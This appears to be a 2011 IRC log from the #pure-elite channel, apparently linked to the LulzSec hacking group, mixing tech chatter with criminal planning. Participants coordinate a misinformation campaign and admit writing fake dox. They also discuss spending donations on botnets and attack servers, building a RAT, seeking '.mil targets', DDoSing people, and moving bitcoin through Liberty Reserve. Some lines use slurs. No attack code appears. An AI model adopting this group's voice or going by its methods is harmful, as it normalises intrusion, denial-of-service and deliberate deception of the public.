04 16:31:20 <pwnsauce> I have to hack into my own server cos my sister changed the root password again Jun 04 16:31:51 <trollpoll> lol Jun 04 16:32:06 <trollpoll> i won this laptop in a hacking challenge Jun 04 16:32:08 <neuron> physical access makes it much easier Jun 04 16:32:18 <trollpoll> well... the rest of the ppl doesnt consider a ha cking challenge Jun 04 16:32:27 <pwnsauce> I have physical, but I want to remote it Jun 04 16:32:28 <trollpoll> they just challenge... Jun 04 16:32:33 <neuron> should we push some of our funds to buy trollpol l a new laptop? Jun 04 16:32:39 <trollpoll> lol Jun 04 16:32:47 <trollpoll> i have 3 Jun 04 16:32:59 <pwnsauce> :D Jun 04 16:33:04 <trollpoll> but, all in use XDD Jun 04 16:33:18 <trollpoll> so, i have tor, i have python...

Jun 04 16:33:24 <trollpoll> i can use links2 with tor... Jun 04 16:33:28 <trollpoll> what more? Jun 04 16:33:41 <pwnsauce> :D Jun 04 16:35:31 <neuron> lol Jun 04 16:35:33 <neuron> trollpoll: vpn man :( Jun 04 16:35:51 <trollpoll> sure Jun 04 16:36:04 <neuron> what are we going to call it? Jun 04 16:36:27 <storm> back Jun 04 16:36:30 <trollpoll> i have to improve my skills on anonymate :) Jun 04 16:36:42 <joepie91> just stresstested a server of mine Jun 04 16:36:43 <joepie91> it did not liek Jun 04 16:36:44 <joepie91> :( Jun 04 16:36:55 <neuron> trollpoll: do you want a vpn? :P im sure we can get you one Jun 04 16:37:10 <joepie91> also Jun 04 16:37:11 <trollpoll> it will be nice Jun 04 16:37:17 <joepie91> I have a pentium 3 laptop Jun 04 16:37:20 <joepie91> it has like 1,1GhZ though Jun 04 16:37:22 <trollpoll> lol Jun 04 16:37:40 <trollpoll> can you run x on it? :D Jun 04 16:37:56 <neuron> Sabu: do you have a spare vpn :E trollpoll has n one Jun 04 16:38:40 <joepie91> trollpoll: I actually run Puppy Linux with IceWM Jun 04 16:38:42 <joepie91> it runs very well Jun 04 16:38:44 <joepie91> I can Skype Jun 04 16:38:49 <joepie91> use Iron (aka Chromium) Jun 04 16:38:52 <joepie91> with Flash Jun 04 16:38:53 <trollpoll> very nice Jun 04 16:38:55 <joepie91> including Tinychat Jun 04 16:38:56 <joepie91> I have Geany Jun 04 16:39:03 <joepie91> a local Hiawatha/PHP/MariaDB stack Jun 04 16:39:10 <joepie91> PMusic as media player Jun 04 16:39:15 <joepie91> Nettalk as IRC client Jun 04 16:39:22 <joepie91> (through WINE) Jun 04 16:39:32 <trollpoll> wow Jun 04 16:39:32 <Sabu> trollpoll I will give you vpn Jun 04 16:39:38 <joepie91> hell, I can even have audio/video conversations with Skype with almost no lagginess Jun 04 16:39:39 <joepie91> :P Jun 04 16:39:43 * joepie91 <3 Puppy Linux Jun 04 16:39:49 <trollpoll> did you tried to use iceweasel? Jun 04 16:39:59 <joepie91> lol Jun 04 16:40:01 <joepie91> firefox raped it Jun 04 16:40:03 <trollpoll> is a disaster Jun 04 16:40:07 <trollpoll> xDD Jun 04 16:40:13 <joepie91> there's a reason I use chromium-based browsers Jun 04 16:40:13 <joepie91> lol Jun 04 16:40:23 <trollpoll> thank you Sabu Jun 04 16:40:23 <joepie91> Firefox like, lagged it to death with 3 tabs ope n Jun 04 16:40:29 <joepie91> in Iron I often have like 25 tabs open Jun 04 16:40:38 <joepie91> and I never get above 80% of my RAM Jun 04 16:40:42 <trollpoll> 3 tabs... you are privileged xDDD Jun 04 16:40:46 <joepie91> total RAM in that box is 384MB RAM Jun 04 16:40:59 <trollpoll> if i start iceweasel, i cant do anything else Jun 04 16:41:33 <joepie91> so basically I am using at most 80% of my 384MB RAM Jun 04 16:41:33 <joepie91> and that includes the OS itself, Iron/Chromium + Tinychat (flash video chat), Skype, Geany, local webserver stack with php/mysql , Streaming music

Jun 04 16:41:40 <joepie91> beat that. :D Jun 04 16:41:47 <trollpoll> thats the ram for! Jun 04 16:41:54 <joepie91> my CPU is the bottleneck Jun 04 16:41:57 <joepie91> Flash tends to fuck it up Jun 04 16:42:01 <joepie91> and go 28.5 load avg Jun 04 16:42:02 <trollpoll> if you dont use, you ar wasting! Jun 04 16:42:03 <joepie91> out of nowhere Jun 04 16:42:09 <joepie91> I'm not even kidding Jun 04 16:42:13 <joepie91> it literally goes up to 28.5 Jun 04 16:45:08 <joepie91> so wait Jun 04 16:45:20 <joepie91> you guys are claiming that lulzsec is a CIA op Jun 04 16:45:30 <trollpoll> sure Jun 04 16:45:31 <joepie91> that Anonymous is working to uncover LulzSec Jun 04 16:45:35 <trollpoll> dont you think is cool? Jun 04 16:45:36 <joepie91> that Adrian Lamo is at the head of it all Jun 04 16:45:41 <joepie91> and people actually BELIEVE this shit? Jun 04 16:45:46 <trollpoll> hahahaha Jun 04 16:45:50 <joepie91> like, seriously Jun 04 16:45:51 <joepie91> : Jun 04 16:45:55 <trollpoll> counter information is usually better than infor mation Jun 04 16:46:06 <trollpoll> as i was talking before Jun 04 16:46:20 <trollpoll> make the ppl think lulzsec is CIA group Jun 04 16:46:24 <trollpoll> makes sense even for me Jun 04 16:46:52 <Topiary> we're not claiming anything joepie, we're lettin g other people think things Jun 04 16:47:02 <Topiary> they are stupid Jun 04 16:47:06 <Topiary> real stupid Jun 04 16:47:11 <trollpoll> btw, what channels are u using? Jun 04 16:47:17 <trollpoll> 4chan? forums? chats? Jun 04 16:47:19 <[redacted]> its called mis-information Jun 04 16:47:20 <[redacted]> :] Jun 04 16:47:23 <Topiary> twitter.com/lulzsec Jun 04 16:47:24 <[redacted]> not counter information Jun 04 16:47:29 <trollpoll> lol Jun 04 16:47:53 <trollpoll> saying something like... "cmon, stop asking us, we are not CIA op" Jun 04 16:48:02 <trollpoll> is the best way to make the ppl think we are.. Jun 04 16:49:27 <neuron> do people think anonymous is after us? Jun 04 16:49:42 <trollpoll> i think so, but storm doesnt :P Jun 04 16:50:52 <storm> who has operator status Jun 04 16:50:56 <storm> to see ips Jun 04 16:51:23 <pwnsauce> storm wants to packet xD Jun 04 16:51:27 <storm> yup Jun 04 16:51:28 <storm> :D Jun 04 16:52:12 <Topiary> don't worry about Anon being after you fine folk s Jun 04 16:52:20 <Topiary> they have no idea about anyone outside of their own circlejerk Jun 04 16:52:25 <neuron> :p im not worried Jun 04 16:52:36 <joepie91> o_O Jun 04 16:52:38 <joepie91> avast Jun 04 16:52:40 <joepie91> now has a sandbox Jun 04 16:52:41 <neuron> lol what are thye gonna do launch there loic can ons my way Jun 04 16:52:47 <joepie91> as in, actual sandbox Jun 04 16:53:05 * joepie91 thinks that's the first free antivirus with a s andbox feature Jun 04 16:56:17 <trollpoll> joepie91, any console app for twitter? xD Jun 04 16:56:43 <trollpoll> ive downloaded the python api but i feel that is

excesive to make my own client just for loling that night... Jun 04 16:56:58 <joepie91> http://www.mactricksandtips.com/2009/01/tweeting -to-twitter-from-terminal.html Jun 04 16:57:00 <neuron> naw lol worth it :P Jun 04 16:57:16 <trollpoll> tnx Jun 04 16:57:35 * joepie91 GONNA BE GOOGLE-FU FIGHTINGGG Jun 04 16:57:58 <neuron> THOSE PACKETS WERE FAST AS LIGHTNING Jun 04 16:58:12 <neuron> THE QUERYS WERE A LITTLE BIT FRIGHTING... Jun 04 16:58:28 <trollpoll> hmm, is not a client, but.. it will work Jun 04 16:58:59 <pwnsauce> Sacre Bleu! Those SYN and ACK! Jun 04 16:59:11 <joepie91> mk Jun 04 16:59:14 <joepie91> inb4 I disconnect Jun 04 17:00:21 <trollpoll> damn, ctr+v in links2 paste... crtl+c closes... Jun 04 17:00:35 <trollpoll> fuuuuuu Jun 04 17:00:47 <pwnsauce> ctrl SHIFT c Jun 04 17:01:24 <trollpoll> late... but thanks!xD Jun 04 17:01:52 <lol> do not trust this swan Jun 04 17:02:20 <joepie91> so Jun 04 17:02:24 <joepie91> the HMA client Jun 04 17:02:26 <joepie91> is practically Jun 04 17:02:28 <joepie91> crashing my system Jun 04 17:02:28 <trollpoll> Jun 04 17:02:30 <joepie91> \o/ Jun 04 17:02:44 <neuron> lmfao joepie91 it just calls openvpn Jun 04 17:03:08 <joepie91> ya idk Jun 04 17:03:11 <joepie91> tell that to the client Jun 04 17:03:49 <joepie91> 4-6-2011 23:03:30 : SENT CONTROL [server]: 'PUS H_REQUEST' (status=1) Jun 04 17:03:50 <joepie91> after this Jun 04 17:03:54 <joepie91> it just starts using an entire CPU core Jun 04 17:03:58 <joepie91> crash shit Jun 04 17:04:01 <joepie91> use more and more memory Jun 04 17:04:04 <joepie91> and not connect to the VPN Jun 04 17:04:28 <neuron> do Jun 04 17:04:33 <neuron> ./hma "Spain, Madrid" Jun 04 17:04:39 <joepie91> what Jun 04 17:04:42 <joepie91> I'm on windows atm -_Jun 04 17:04:48 <neuron> lmfao that explains it :P Jun 04 17:04:57 <joepie91> eh. Jun 04 17:05:03 <joepie91> ultravpn has never caused any issues. Jun 04 17:07:18 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 17:07:25 * joepie92 (joepie91@HA-864.t9g.4u7qps.IP) has joined #pur e-elite Jun 04 17:07:29 <joepie92> well Jun 04 17:07:33 <joepie92> PPTP works Jun 04 17:07:37 <joepie92> but OpenVPN, no bone Jun 04 17:07:55 <neuron> use pptp Jun 04 17:08:31 <joepie92> mm Jun 04 17:08:41 <pwnsauce> joepie92 Jun 04 17:08:44 <joepie92> ? Jun 04 17:08:47 <pwnsauce> how long should mtgox take Jun 04 17:08:52 <pwnsauce> to trnafer BTC to LR Jun 04 17:08:58 <pwnsauce> cos we transferred some Jun 04 17:09:00 <joepie92> idk, I don't use LR Jun 04 17:09:02 <pwnsauce> and my balance is still 0 Jun 04 17:09:06 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:09:06 <joepie92> I always do SEPA transfers Jun 04 17:09:10 * joepie92 is now known as joepie91 Jun 04 17:09:13 <Topiary> I sent you guys 2 BTC

Jun 04 17:09:17 <pwnsauce> U5764978 Jun 04 17:09:25 <pwnsauce> that account is the one the LR needs to goto Jun 04 17:10:02 <lol> yeh might just take a while :) Jun 04 17:10:13 <lol> it went to mtgox and i sent to LR Jun 04 17:10:26 <pwnsauce> okey :D Il just keep checking :) Jun 04 17:10:45 <neuron> going from BTC to LR to USD? Jun 04 17:11:04 <pwnsauce> BTC -> LR -> Someone Elses LR i think Jun 04 17:11:23 <Sabu> we need to own some serious bitcoins . Jun 04 17:12:18 <pwnsauce> aye Jun 04 17:12:20 <pwnsauce> Sabu Jun 04 17:12:23 <pwnsauce> ill PM Jun 04 17:14:14 <storm> we have 400+ in donations Jun 04 17:14:56 <pwnsauce> sheeeeet Jun 04 17:15:09 <neuron> lol dammn what are we gonna do with it? Jun 04 17:15:09 <joepie91> ok, now I mad Jun 04 17:15:15 <joepie91> I have issues connecting to shit Jun 04 17:15:15 <joepie91> :/ Jun 04 17:15:53 <pwnsauce> neuron - buy servers and bots Jun 04 17:16:27 <Topiary> already sent kayla money for bots, sending Sabu money for servers when he wants it Jun 04 17:16:30 <Topiary> we have 500USD in donations Jun 04 17:16:34 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure -elite Jun 04 17:17:28 <trollpoll> really i wonder how ppl supports lulzsec more th an Anonymous... Jun 04 17:17:41 <joepie91> that is what I have been wondering about Jun 04 17:17:42 <joepie91> :/ Jun 04 17:18:03 <trollpoll> that makes you think... Jun 04 17:18:30 <Topiary> LESS THINKING MORE DRINKING! Jun 04 17:19:18 <trollpoll> hehe, i drink... beer without alcohol! Jun 04 17:19:31 <trollpoll> and grog Jun 04 17:20:59 <joepie91> mk Jun 04 17:20:59 <joepie91> so Jun 04 17:21:03 <joepie91> OpNoPro says Jun 04 17:21:08 <joepie91> that 2 of the people in the dox are correct at l east Jun 04 17:21:11 <joepie91> and he doesn't know about the others Jun 04 17:21:12 <joepie91> :p Jun 04 17:21:21 <joepie91> also, trollpoll: I drink beer without alcohol oc casionally Jun 04 17:21:24 <io> hm in what fox? Jun 04 17:21:27 <io> dox* Jun 04 17:21:30 <joepie91> http://pastebin.com/RBjzDQbS Jun 04 17:21:52 <io> wat? how can 2 are correct lulz Jun 04 17:22:11 <joepie91> ohwell Jun 04 17:22:21 <joepie91> I will just follow his lead Jun 04 17:22:21 <joepie91> :D Jun 04 17:22:32 <Avunit> Theyre all true! Jun 04 17:22:33 <Avunit> damnit! D: Jun 04 17:22:38 <io> heh. HE MUST KNOW IT Jun 04 17:22:46 <io> HE IS BADASS KINDA_PSEUDO_EX_SPOOK Jun 04 17:22:48 <io> or something Jun 04 17:22:52 <joepie91> also Jun 04 17:22:55 <Topiary> he most know that shit, kayla and I wrote those dox and we HATE LULZSEC FAGGOTS Jun 04 17:22:59 <joepie91> people seem to actually believe Jun 04 17:23:04 <joepie91> that it's a CIA op Jun 04 17:23:07 <joepie91> to show how unsafe the internet is Jun 04 17:23:09 <Topiary> I know, it's brilliant Jun 04 17:23:12 <joepie91> and put more restrictions in place

Jun 04 17:23:13 <joepie91> my god Jun 04 17:23:17 <joepie91> you just tell some bullshit story Jun 04 17:23:23 <joepie91> and people fill in the rest for you Jun 04 17:23:24 <joepie91> :D Jun 04 17:23:25 <io> as if they would need any excuse Jun 04 17:23:29 <io> lol, they make just shit up Jun 04 17:23:32 <neuron> i want people to say were aliens! Jun 04 17:23:34 <io> and if in doubt, they use the CP hammer Jun 04 17:23:35 <joepie91> io: that's exactly what I have been saying Jun 04 17:23:37 <joepie91> to people who go Jun 04 17:23:43 <joepie91> OMG YOU SHOULD NOT HACK FOR FREEDOM Jun 04 17:23:46 <Topiary> <parr0t> did he enjoy pay? Jun 04 17:23:47 <Topiary> <Whirlpool> definitely; it's a lot of money Jun 04 17:23:47 <Topiary> <jux> who? what? Jun 04 17:23:47 <Topiary> <Whirlpool> Topiary Jun 04 17:23:47 <Topiary> <parr0t> 5000 wow Jun 04 17:23:47 <Topiary> <Whirlpool> 7500, he wanted more Jun 04 17:23:47 <joepie91> IT WILL ONLY MAKE THEM CLAMP DOWN HARDER Jun 04 17:23:49 <Topiary> <Whirlpool> couldn't exactly say no Jun 04 17:23:51 <Topiary> <parr0t> LOL Jun 04 17:23:53 <Topiary> <jux> USD? Jun 04 17:23:54 <io> WE MUST RESTRICTS THE INTERNETZ. THERE IS CP AND TERROR. Jun 04 17:23:55 <Topiary> <Whirlpool> yep Jun 04 17:23:57 <Topiary> <jux> what for? Jun 04 17:23:59 <Topiary> <Whirlpool> private :D Jun 04 17:24:01 <Topiary> <jux> lol k Jun 04 17:24:03 <Topiary> this will mindfuck EVERYONE Jun 04 17:24:10 <joepie91> yeah, because a government person really cares w hether their site is down or not, in pushing a bill Jun 04 17:24:10 <joepie91> also lol Jun 04 17:24:27 <lol> guys i dont think us being on tht irc is a good idea Jun 04 17:24:33 <lol> please dont follow any of their links Jun 04 17:24:36 <joepie91> what IRC? Jun 04 17:24:38 <lol> they know what they're doing Jun 04 17:24:46 <joepie91> ED? Jun 04 17:24:50 <lol> yeh Jun 04 17:27:02 <joepie91> can you guys connect to kerpia.cryto.net ? Jun 04 17:27:02 <joepie91> irc Jun 04 17:27:26 <Topiary> everyone leave ED IRC Jun 04 17:27:35 <Topiary> this is serious, military hackers trying to hack us Jun 04 17:27:37 <Topiary> don't stay there Jun 04 17:28:17 <pwnsauce> i propose Operation:/b/ackraid Jun 04 17:28:23 <pwnsauce> we need .mil targets Jun 04 17:29:12 <storm> how do you know Topiary? Jun 04 17:29:27 <Topiary> they were PMing us Jun 04 17:29:30 <Topiary> acting like trolls Jun 04 17:29:32 <storm> logs? Jun 04 17:29:32 <Topiary> ask kayla Jun 04 17:29:38 <Topiary> kayla can you explain? Jun 04 17:29:46 <storm> please do. Jun 04 17:31:17 <neuron> lol: explain? Jun 04 17:31:19 <lol> look, those mil/fbi trolls are smart, everyone i talked to how claimed to be a hacker knows their shit and it not just pentesting shit i was going over scada which is like automation in machines and vulnerabilities a nd he was talking about clinet side attacks and shit they know what they're doin g and you'd be a fool to think they're not there to pwn you Jun 04 17:31:52 <lol> we dont need to be on tht irc Jun 04 17:31:52 <lol> it's not safe

Jun 04 17:32:00 <Sabu> storm, quit with a ping timeout Jun 04 17:32:01 <lol> please just leave it Jun 04 17:32:05 <neuron> i think we should move to our newer irc Jun 04 17:32:06 <storm> I did? Jun 04 17:32:21 <lol> i really hope no one here has followed any of their link s or opened any of their files Jun 04 17:32:29 <Topiary> don't think so Jun 04 17:32:39 <storm> i didnt Jun 04 17:32:42 <neuron> Im not in there and not oped so i didnt Jun 04 17:32:53 <Sabu> ok Jun 04 17:33:02 <Sabu> now that we had our public face the day Jun 04 17:33:06 <Sabu> lets focus on our next moves Jun 04 17:33:25 <Sabu> neuron what are you up to? Jun 04 17:33:28 <lol> everyone just leave tht server forget it exists Jun 04 17:33:39 <neuron> Sabu: me and pwnsauce are working on a nice RAT Jun 04 17:33:45 <joepie91> k, so I can't find a route to host... to my own irc Jun 04 17:33:45 <joepie91> wat do Jun 04 17:33:47 <neuron> that is my current focus Jun 04 17:34:09 <neuron> if im needed else were do tell Jun 04 17:34:10 <lol> most of them were talking really smarmy too like they ha d somethig on us Jun 04 17:34:28 <lol> if someone in this chan got owned we're all compromised now Jun 04 17:34:36 <neuron> 0-0\ Jun 04 17:34:45 <Sabu> ok great Jun 04 17:34:53 <neuron> If you were on that chan and you opened a file. rm your box plox Jun 04 17:35:02 <storm> how do i make it look like i pinged? Jun 04 17:35:04 <Sabu> neuron focus on the rat Jun 04 17:35:16 <Sabu> /quit Ping timeout Jun 04 17:35:19 <Sabu> rofl Jun 04 17:35:19 <joepie91> storm Jun 04 17:35:19 <joepie91> no Jun 04 17:35:22 <joepie91> storm Jun 04 17:35:24 <storm> thats not a ping timeout Jun 04 17:35:25 <storm> lol Jun 04 17:35:27 <joepie91> just literally pull your ethernet plug Jun 04 17:35:27 <Sabu> hes already off Jun 04 17:35:29 <storm> thats jsut the reason Jun 04 17:35:30 <[redacted]> SO MUCH FOR OPSEC Jun 04 17:35:34 <storm> lol Jun 04 17:35:37 <joepie91> literally pull your plug lol Jun 04 17:35:46 <storm> lol im not on from my home ip Jun 04 17:35:48 <storm> you doof Jun 04 17:35:50 <storm> i use shellz Jun 04 17:36:08 <joepie91> ah, shell. Jun 04 17:36:09 <joepie91> ye. Jun 04 17:36:10 <joepie91> idk Jun 04 17:36:10 <joepie91> lol Jun 04 17:36:30 <joepie91> inb4 Ryan rages Jun 04 17:36:36 <joepie91> and baleets fucking everyone Jun 04 17:37:10 <Topiary> Ryan needs a psychologist Jun 04 17:37:14 <Topiary> I will be his psychologist Jun 04 17:37:18 <Topiary> in return for bots Jun 04 17:37:20 <joepie91> Topiary Jun 04 17:37:24 <joepie91> don't start throwing chairs again Jun 04 17:37:25 <joepie91> kthx Jun 04 17:37:27 <joepie91> those things are expensive Jun 04 17:37:40 <joepie91> like, seriously

Jun 04 17:37:46 <joepie91> you smashed a 300 euro chair on Barretts head Jun 04 17:37:47 <joepie91> a few days ago Jun 04 17:37:48 <joepie91> : Jun 04 17:38:02 <Topiary> you're tripping me out bro Jun 04 17:38:06 <joepie91> :D Jun 04 17:38:40 <trollpoll> <Sabu> now that we had our public face the day < --- lol bro Jun 04 17:38:46 <joepie91> also Jun 04 17:38:53 <joepie91> just saying Jun 04 17:38:58 <joepie91> I read a blog post yesterday Jun 04 17:39:05 <joepie91> that basically said LulzSec was a very good test to see Jun 04 17:39:09 <joepie91> how anonymous Bitcoin really is Jun 04 17:39:15 <neuron> 0-0\ good point haha Jun 04 17:39:31 <joepie91> tl;dr we are now lab rats Jun 04 17:39:32 <tflow> link? Jun 04 17:39:39 <joepie91> lemme see if I can find it in my history Jun 04 17:39:45 * joepie91 opens way too many pages every day Jun 04 17:40:06 <io> yeah i read that too Jun 04 17:40:30 <io> http://techliberation.com/2011/06/03/bitcoin-silk-road-a nd-lulzsec-oh-my/ Jun 04 17:40:35 * lol has quit (Ping timeout: 121 seconds) Jun 04 17:40:42 <tflow> ah nice Jun 04 17:41:47 <joepie91> fff Jun 04 17:41:54 <joepie91> beat me to it Jun 04 17:41:55 <joepie91> :( Jun 04 17:42:57 <io> joepie91google bitcoin lulzsec anonymous :p Jun 04 17:43:10 <io> faster than history heh Jun 04 17:43:22 <joepie91> ye I did that Jun 04 17:43:26 <joepie91> >.> Jun 04 17:43:58 <io> then you must type like my mom :D Jun 04 17:44:15 * trollpoll has quit (Ping timeout: 121 seconds) Jun 04 17:44:39 <joepie91> notrly Jun 04 17:44:42 <joepie91> lol Jun 04 17:44:46 <joepie91> this vpn node sucks Jun 04 17:44:53 <joepie91> I can't even connect to my own irc Jun 04 17:44:54 <joepie91> : Jun 04 17:45:01 <joepie91> No route to host Jun 04 17:48:04 <joepie91> this is almost scary Jun 04 17:48:11 <joepie91> other person: I'm fapping, don't interrupt me Jun 04 17:48:16 <joepie91> me: mk, cam, wanna see Jun 04 17:48:21 <joepie91> other person: really? :o sec Jun 04 17:48:44 <neuron> wtf' Jun 04 17:49:29 * trollpoll (trollpoll@HA-9fh.11n.cc0br2.IP) has joined #p ure-elite Jun 04 17:50:28 <Sabu> joepie use the other vpn hosts Jun 04 17:50:37 <storm> halfdead is good pplz Jun 04 17:50:40 <Sabu> youre telling me out the 80 vpn hosts hma has Jun 04 17:50:41 <storm> i see the pastebin Jun 04 17:50:46 <Sabu> none of them connect? Jun 04 17:51:00 <neuron> storm: halfdead? Jun 04 17:51:04 <joepie91> Sabu: actually after I typed that shit I connect ed to my IRC Jun 04 17:51:06 <joepie91> idk what was wrong Jun 04 17:51:13 <joepie91> and I don't like switching VPNs, all my shit has to reconnect Jun 04 17:51:14 <joepie91> and shit Jun 04 17:51:50 <[redacted]> 90% of the IRC's convo is joepie saying stuff Jun 04 17:51:51 <[redacted]> :] Jun 04 17:51:52 <storm> ues

Jun 04 17:51:54 <storm> yes Jun 04 17:52:01 <storm> hes a friend from #phrack Jun 04 17:52:03 <storm> hes hardcore Jun 04 17:52:21 <joepie91> [redacted]: I know, I'm very talkative Jun 04 17:52:24 <joepie91> a bit too talkative sometimes Jun 04 17:52:31 <joepie91> on the other hand, works fairly well to gather i ntel :) Jun 04 17:53:33 <Sabu> sup [redacted] you sexy ass nig Jun 04 17:53:38 <storm> sabu Jun 04 17:53:42 <storm> did you see this pastebin yet? Jun 04 17:53:52 <storm> http://pastebin.com/RBjzDQbS Jun 04 17:54:03 <io> he's op in #phrack on efnet Jun 04 17:54:12 <io> which is not the ezine btw but the group Jun 04 17:54:22 <storm> i know who he is Jun 04 17:54:23 <storm> ;p Jun 04 17:54:30 <io> someone asked above Jun 04 17:54:35 <storm> he is friends with 2l8 Jun 04 17:54:36 <storm> ah Jun 04 17:54:40 <io> neuron.. was just adding my info :) Jun 04 17:54:46 <neuron> lol Jun 04 17:54:47 <storm> :p Jun 04 17:55:16 <joepie91> meh. Jun 04 17:55:18 <joepie91> 0.79mbps Jun 04 17:55:25 <joepie91> methinks I'm going to try a different vpn node Jun 04 17:55:28 <joepie91> in a bit Jun 04 17:55:29 <joepie91> :P Jun 04 17:56:10 <Sabu> true Jun 04 17:56:19 <trollpoll> man, this pastebin is very cool Jun 04 17:56:21 <trollpoll> who rote? Jun 04 17:56:25 <trollpoll> wrote* Jun 04 17:56:42 <storm> hm Jun 04 17:57:23 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pur e-elite Jun 04 17:58:10 <storm> jux probably Jun 04 17:58:20 <storm> must be an agent Jun 04 17:59:27 <trollpoll> ok, so, here who is from CIA? Jun 04 17:59:31 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 17:59:35 <trollpoll> :) Jun 04 18:16:49 * Disconnected (Invalid argument). **** ENDING LOGGING AT Sat Jun 4 18:16:49 2011 **** BEGIN LOGGING AT Sat Jun 4 18:17:02 2011 Jun 04 18:17:02 * Now talking on #pure-elite Jun 04 18:17:02 * Topic for #pure-elite is: pE Research and exploit deve lopment Coding, designing, penetrating, packeting, laughing at our crippled op ponents Jun 04 18:17:02 * Topic for #pure-elite set by Topiary!t@HA-p22.rkn.75e5ku .IP at Fri Jun 3 17:06:56 2011 Jun 04 18:18:00 * neuron listens to wub wub wub Jun 04 18:18:04 <lol> i dont understand this open letter wht is it trying to s ay? Jun 04 18:18:06 <lol> :o Jun 04 18:18:21 <joepie91> I'll talk to jaromil Jun 04 18:18:33 <joepie91> he seems to not get a few things Jun 04 18:18:34 <joepie91> >.> Jun 04 18:18:40 <trollpoll> is out of context Jun 04 18:19:20 <joepie91> I get his point Jun 04 18:19:21 <joepie91> however Jun 04 18:19:34 <joepie91> With its dramatic announcement

Jun 04 18:19:34 <joepie91> the LoU played into the hands of policy makers w ho want complete Jun 04 18:19:34 <joepie91> control over the Internet and are looking for re asons to seize it. Jun 04 18:20:00 <joepie91> that is the same argument as "by taking down shi t you only give them more reason to crack down" Jun 04 18:20:12 <joepie91> which is, imo, plain bullshit Jun 04 18:20:41 <lol> i think stuxnet proved the internet is not needed to eng age in cyber war Jun 04 18:20:58 <trollpoll> I love this ending "Now we are all sons of bitch es" Jun 04 18:21:07 <trollpoll> is epic Jun 04 18:22:00 <io> also, they do already have laws against hacking. all the y do is whine now.. and what's ther bigges action? they call it now war. or terr orism even, whatever. Jun 04 18:22:05 <io> it doesn't help them with their problem Jun 04 18:22:18 <io> that worked in afghanistan or iraq cause they needed leg itimation to raid Jun 04 18:22:24 <io> but wat now? invade the internet? Jun 04 18:22:42 <io> and they cant restrict it the way they would like to Jun 04 18:22:46 <io> ecomomics would crash Jun 04 18:22:52 <trollpoll> thats the term "invade", all of us, thinks that internet is a real independent state Jun 04 18:22:57 <trollpoll> (all of us?) Jun 04 18:23:21 <trollpoll> so, any state invaded will try to defense Jun 04 18:23:30 <trollpoll> and obviously, counter attack Jun 04 18:23:41 <io> yup, internet is very similar to a sate Jun 04 18:23:56 <io> it state* Jun 04 18:24:00 <io> gah. Jun 04 18:24:19 <trollpoll> of course they started the war, trying to politi ce internet, and trying to impose their law Jun 04 18:24:54 <joepie91> ya Jun 04 18:25:06 <joepie91> it would be funny if it weren't so sad Jun 04 18:25:16 <joepie91> to see how corporations are trying to "claim" th e internet Jun 04 18:25:24 <lol> ok so has everyone left tht irc now? Jun 04 18:25:25 <trollpoll> yes Jun 04 18:25:25 <joepie91> as if it's their exclusive distribution platform Jun 04 18:25:38 <joepie91> it wasn't made this way for them in the first pl ace, damnit Jun 04 18:26:05 <trollpoll> thats it, they are trying to convert internet in a "desktop app" with as many links as you can pay Jun 04 18:26:25 <joepie91> ya Jun 04 18:26:38 <joepie91> corporations should realize the internet isn't t heirs Jun 04 18:26:44 <joepie91> and I don't mean the physical tubes Jun 04 18:26:48 <joepie91> but the actual internet Jun 04 18:26:51 <joepie91> the community, idea, concept Jun 04 18:27:25 <trollpoll> yes, the utopie is to create a new internet... c orporation free Jun 04 18:27:40 <trollpoll> using each one its infrastructures Jun 04 18:28:32 <trollpoll> or perhaps, a big corp like google inverting in infrastructures Jun 04 18:28:48 <trollpoll> inverting? Jun 04 18:28:51 <trollpoll> ... Jun 04 18:30:00 <joepie91> mye Jun 04 18:30:00 <joepie91> also Jun 04 18:30:03 <joepie91> what the fuck Jun 04 18:30:08 <joepie91> what is with all these companies and orgs Jun 04 18:30:09 <joepie91> going all

Jun 04 18:30:14 <joepie91> OMG WE NEED A NEW DESKTOP EXPERIENCE Jun 04 18:30:16 <joepie91> first Unity Jun 04 18:30:17 <joepie91> then GNOME3 Jun 04 18:30:20 <joepie91> now Windows 8? Jun 04 18:30:24 <joepie91> http://www.youtube.com/watch?v=8upI6M4T92U Jun 04 18:30:33 <joepie91> this shit is as counterproductive as possibly ca n be, my god Jun 04 18:30:58 <joepie91> it's the web 2.0 of the desktop OS -_Jun 04 18:31:47 <pwnsauce> i used win8 leaked Jun 04 18:31:49 <pwnsauce> is very gay Jun 04 18:32:03 <Topiary> what the fuck is that, Kinect on steroids? Jun 04 18:32:06 <trollpoll> of course they want to convert a pc in an iphone Jun 04 18:32:19 <Topiary> seriously I'm mad at all this stupid waggle-your -arms-to-pet-tiger technology Jun 04 18:32:30 <joepie91> ya Jun 04 18:32:38 <joepie91> seriously Jun 04 18:32:40 <joepie91> web 2.0 Jun 04 18:32:43 <joepie91> now on your desktop OS Jun 04 18:32:44 * Topiary is a beast with the mouse/keyboard/gamepad Jun 04 18:32:50 <joepie91> you know what's the worst? Jun 04 18:32:57 <joepie91> linux was the goddamn first OS to have this stup id crap Jun 04 18:33:02 <trollpoll> ppl will love... Jun 04 18:33:04 <joepie91> Unity, GNOME3... Jun 04 18:33:28 <joepie91> trollpoll: people love anyting as long as the bu zzword:crash ratio is above 1 Jun 04 18:33:35 <joepie91> anything* Jun 04 18:33:54 <trollpoll> years ago i was talking about this, someone told me, web browsers are the SO of the future Jun 04 18:34:02 <Topiary> people love anything they can virtually drag the ir fat finger across, as long as it makes a contrail behind it in shiny effects Jun 04 18:34:28 <storm> i love porn Jun 04 18:34:45 <neuron> i agree with storm Jun 04 18:34:48 <neuron> he makes a valid poin Jun 04 18:35:04 <lol> lol :D Jun 04 18:35:04 <trollpoll> ok, i got it, stop talking about shit Jun 04 18:35:20 <trollpoll> everybody knows, internet is for pr0nnnn Jun 04 18:36:17 <trollpoll> (but after few years storm, you will have a uniq ue destktop application called porn and you will pay for that) Jun 04 18:36:25 <trollpoll> xDD Jun 04 18:36:53 <joepie91> po.rn Jun 04 18:37:16 <lol> ewww pron is disgusting :O Jun 04 18:37:19 <lol> xD Jun 04 18:37:53 <pwnsauce> joepie91 - reg that domain and fill it with sho ck videos xD Jun 04 18:38:18 <joepie91> lol Jun 04 18:38:19 <joepie91> also Jun 04 18:38:22 <joepie91> I am going to take a stab Jun 04 18:38:31 <joepie91> and say that Windows 8 uses 